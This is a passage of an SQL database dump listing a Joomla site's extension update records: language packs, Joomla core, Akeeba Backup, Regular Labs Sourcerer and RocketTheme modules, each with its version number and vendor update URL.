7,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5462,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5463,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5464,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5465,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5466,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5467,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5468,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5469,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5470,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5471,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5472,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5473,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5474,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5475,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5476,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5477,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5478,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5479,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5480,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5481,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5482,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5483,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5484,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5485,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5486,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5487,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5488,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(5489,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5490,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5491,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5492,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5493,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5494,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5495,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5496,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5497,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5498,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5499,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5500,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5501,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5502,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5503,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5504,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5505,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5506,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5507,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5508,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5509,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5510,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5511,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5512,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5513,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5514,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5515,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5516,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5517,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5518,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5519,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5520,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5521,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5522,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5523,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5524,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5525,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5526,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5527,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5528,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5529,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5530,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5531,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5532,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5533,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5534,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5535,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5536,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5537,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5538,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5539,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5540,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5541,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5542,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5543,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5544,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5545,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5546,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5547,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5548,3,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5549,3,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5550,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/138/2084920890','',''),(5551,20,0,'RokGallery Extension','','mod_rokgallery','module','',0,'2.45','0802','http://updates.rockettheme.com/joomla/286/21ffe006','',''),(5552,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/286/326466299','',''),(5553,20,0,'RokWeather','','','module','',0,'2.0.4','0802','http://updates.rockettheme.com/joomla/313/1307741342','',''),(5554,20,0,'RokMiniEvents','','','module','',0,'3.0.3','0802','http://updates.rockettheme.com/joomla/313/1301311221','',''),(5555,20,0,'RokCommon Plugin','','','plugin','',0,'3.2.8','0802','http://updates.rockettheme.com/joomla/381/337128173','',''),(5556,57,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5557,57,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5558,57,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5559,57,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5560,57,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5561,57,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5562,57,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5563,57,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5564,57,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5565,57,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5566,57,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5567,57,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5568,57,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5569,57,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5570,57,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5571,57,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5572,57,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5573,57,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5574,57,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5575,57,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5576,57,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5577,57,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5578,57,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5579,57,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5580,57,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5581,57,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5582,57,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5583,57,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5584,57,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5585,57,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5586,57,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5587,57,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5588,57,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5589,57,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5590,57,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5591,57,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5592,57,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5593,57,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5594,57,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5595,57,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5596,57,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5597,57,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5598,57,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5599,57,0,'English NZ','','pkg_en-NZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-NZ_details.xml','',''),(5600,57,0,'Kazakh','','pkg_kk-KZ','package','',0,'3.9.8.1','','https://update.joomla.org/language/details3/kk-KZ_details.xml','',''),(5601,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5602,76,0,'Akeeba Frontend Framework (FEF)','Akeeba Frontend Framework (FEF)','file_fef','file','',1,'1.0.8','','http://cdn.akeebabackup.com/updates/fef.xml','https://www.akeebabackup.com/component/ars/?view=Items&release_id=3077',''),(5603,93,0,'Regular Labs - Sourcerer','','sourcerer','plugin','system',0,'8.2.0FREE','','https://download.regularlabs.com/updates.xml?e=sourcerer&type=.xml','https://www.regularlabs.com/extensions/sourcerer#download',''),(5604,101,0,'FOF 3.x Stable','FOF 3.x Stable','lib_fof30','library','',1,'3.4.7','','http://cdn.akeebabackup.com/updates/fof3_file.xml','\n			https://www.akeebabackup.com/download/fof3/3-4-7.html			\n		',''),(5606,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5607,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5608,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5609,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5610,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5611,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5612,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5613,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5614,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5615,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5616,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5617,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5618,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5619,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5620,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5621,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5622,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5623,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5624,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5625,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5626,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5627,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5628,1,0,'Joomla','','joomla','file','',0,'3.9.12','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(5629,67,0,'Akeeba Backup Core package','Akeeba Backup Core package','pkg_akeeba','package','',0,'6.6.1','','https://cdn.akeebabackup.com/updates/pkgakeebacore.xml','\n			https://www.akeebabackup.com/download/akeeba-backup/6-6-1.html			\n		',''),(5630,3,0,'Romanian','','pkg_ro-RO','package','',0,'3.9.7.1','','https://update.joomla.org/language/details3/ro-RO_details.xml','',''),(5631,3,0,'Flemish','','pkg_nl-BE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-BE_details.xml','',''),(5632,3,0,'French','','pkg_fr-FR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fr-FR_details.xml','',''),(5633,3,0,'Georgian','','pkg_ka-GE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ka-GE_details.xml','',''),(5634,3,0,'Greek','','pkg_el-GR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/el-GR_details.xml','',''),(5635,3,0,'Japanese','','pkg_ja-JP','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ja-JP_details.xml','',''),(5636,3,0,'Hungarian','','pkg_hu-HU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hu-HU_details.xml','',''),(5637,3,0,'Afrikaans','','pkg_af-ZA','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/af-ZA_details.xml','',''),(5638,3,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/ar-AA_details.xml','',''),(5639,3,0,'Catalan','','pkg_ca-ES','package','',0,'3.9.11.2','','https://update.joomla.org/language/details3/ca-ES_details.xml','',''),(5640,3,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/zh-CN_details.xml','',''),(5641,3,0,'Croatian','','pkg_hr-HR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/hr-HR_details.xml','',''),(5642,3,0,'Czech','','pkg_cs-CZ','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cs-CZ_details.xml','',''),(5643,3,0,'Danish','','pkg_da-DK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/da-DK_details.xml','',''),(5644,3,0,'Dutch','','pkg_nl-NL','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/nl-NL_details.xml','',''),(5645,3,0,'Italian','','pkg_it-IT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/it-IT_details.xml','',''),(5646,3,0,'Lithuanian','','pkg_lt-LT','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/lt-LT_details.xml','',''),(5647,3,0,'Persian','','pkg_fa-IR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fa-IR_details.xml','',''),(5648,3,0,'Polish','','pkg_pl-PL','package','',0,'3.9.6.1','','https://update.joomla.org/language/details3/pl-PL_details.xml','',''),(5649,3,0,'Portuguese','','pkg_pt-PT','package','',0,'3.9.5.1','','https://update.joomla.org/language/details3/pt-PT_details.xml','',''),(5650,3,0,'Russian','','pkg_ru-RU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ru-RU_details.xml','',''),(5651,3,0,'English AU','','pkg_en-AU','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-AU_details.xml','',''),(5652,3,0,'Slovak','','pkg_sk-SK','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sk-SK_details.xml','',''),(5653,3,0,'English US','','pkg_en-US','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-US_details.xml','',''),(5654,3,0,'Swedish','','pkg_sv-SE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sv-SE_details.xml','',''),(5655,3,0,'Tamil','','pkg_ta-IN','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/ta-IN_details.xml','',''),(5656,3,0,'Thai','','pkg_th-TH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/th-TH_details.xml','',''),(5657,3,0,'German DE','','pkg_de-DE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-DE_details.xml','',''),(5658,3,0,'Portuguese Brazil','','pkg_pt-BR','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/pt-BR_details.xml','',''),(5659,3,0,'Serbian Latin','','pkg_sr-YU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-YU_details.xml','',''),(5660,3,0,'Spanish','','pkg_es-ES','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/es-ES_details.xml','',''),(5661,3,0,'Bosnian','','pkg_bs-BA','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/bs-BA_details.xml','',''),(5662,3,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sr-RS_details.xml','',''),(5663,3,0,'Finnish','','pkg_fi-FI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/fi-FI_details.xml','',''),(5664,3,0,'Swahili','','pkg_sw-KE','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sw-KE_details.xml','',''),(5665,3,0,'English CA','','pkg_en-CA','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/en-CA_details.xml','',''),(5666,3,0,'Welsh','','pkg_cy-GB','package','',0,'3.9.11.1','','https://update.joomla.org/language/details3/cy-GB_details.xml','',''),(5667,3,0,'Slovenian','','pkg_sl-SI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/sl-SI_details.xml','',''),(5668,3,0,'Spanish CO','','pkg_es-CO','package','',0,'3.9.10.1','','https://update.joomla.org/language/details3/es-CO_details.xml','',''),(5669,3,0,'German CH','','pkg_de-CH','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-CH_details.xml','',''),(5670,3,0,'German AT','','pkg_de-AT','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-AT_details.xml','',''),(5671,3,0,'German LI','','pkg_de-LI','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LI_details.xml','',''),(5672,3,0,'German LU','','pkg_de-LU','package','',0,'3.9.12.1','','https://update.joomla.org/language/details3/de-LU_details.xml','',''),(5673,3,0,'English 